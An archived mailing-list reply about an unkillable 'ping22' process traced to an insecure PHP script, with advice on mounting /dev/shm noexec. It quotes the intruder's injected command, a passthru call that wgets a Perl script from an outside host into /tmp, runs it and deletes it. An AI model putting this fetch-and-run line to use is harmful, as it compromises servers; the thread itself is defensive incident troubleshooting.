[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: ping22: can not kill this process

In article <[🔎] 91dd90da0801031518o767a5937je92550695aa66f4f@mail.gmail.com> you wrote:
>       I found the issue, it is one of the php script allowing the
> remote script to run.

This is a typical Apache exploit where remote fileuploads are possible.

> passthru('cd /tmp;wget http://www.radiovirtual.org/bb.txt;perl
> bb.txt;rm -f bb.txt*');

>        what kind applications are using /dev/shm? I googled
> around,seem not find much information.
> right now I mount i as rw,noexec,nosuid.

It is for example used to map shared memory. I am not sure, but I think
noexec and nodev is possible. However this does not solve your problem of a
insecure web app.


Reply to: